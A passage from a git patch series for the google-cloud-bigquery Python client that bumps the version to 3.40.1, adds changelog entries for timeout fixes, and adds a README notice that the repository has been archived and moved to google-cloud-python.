--- .librarian/state.yaml | 2 +- CHANGELOG.md | 13 +++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 15 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 71bcf16ad..efce633f2 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,7 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.40.0 + version: 3.40.1 last_generated_commit: "" apis: [] source_roots: diff --git a/CHANGELOG.md b/CHANGELOG.md index 242165933..083dbfc4f 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,19 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.40.1](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.40.0...google-cloud-bigquery-v3.40.1) (2026-02-12) + + +### Documentation + +* clarify that only jobs.query and jobs.getQueryResults are affec… (#2349) ([73228432a3c821db05d898ea4a4788adf15b033d](https://github.com/googleapis/google-cloud-python/commit/73228432a3c821db05d898ea4a4788adf15b033d)) + + +### Bug Fixes + +* updates timeout/retry code to respect hanging server (#2408) ([24d45d0d5bf89762f253ba6bd6fdbee9d5993422](https://github.com/googleapis/google-cloud-python/commit/24d45d0d5bf89762f253ba6bd6fdbee9d5993422)) +* add timeout parameter to to_dataframe and to_arrow met… (#2354) ([4f67ba20b49159e81f645ed98e401b9bb1359c1a](https://github.com/googleapis/google-cloud-python/commit/4f67ba20b49159e81f645ed98e401b9bb1359c1a)) + ## [3.40.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.39.0...google-cloud-bigquery-v3.40.0) (2026-01-08) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 6b0fa0fba..2519009bf 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.40.0" +__version__ = "3.40.1" From ca965f25fa3df5915d8763d277bb014a3de124cd Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 6 Mar 2026 12:43:50 -0500 Subject: [PATCH 202/202] build: update README to indicate that source has moved (#2421) Towards https://github.com/googleapis/google-cloud-python/issues/10980 --- README.rst | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.rst b/README.rst index 23ed9257d..5f8650b2b 100644 --- a/README.rst +++ b/README.rst @@ -1,3 +1,8 @@ +:**NOTE**: **This github repository is archived. The repository contents and history have moved to** `google-cloud-python`_. + +.. _google-cloud-python: https://github.com/googleapis/google-cloud-python/tree/main/packages/google-cloud-bigquery + + Python Client for Google BigQuery =================================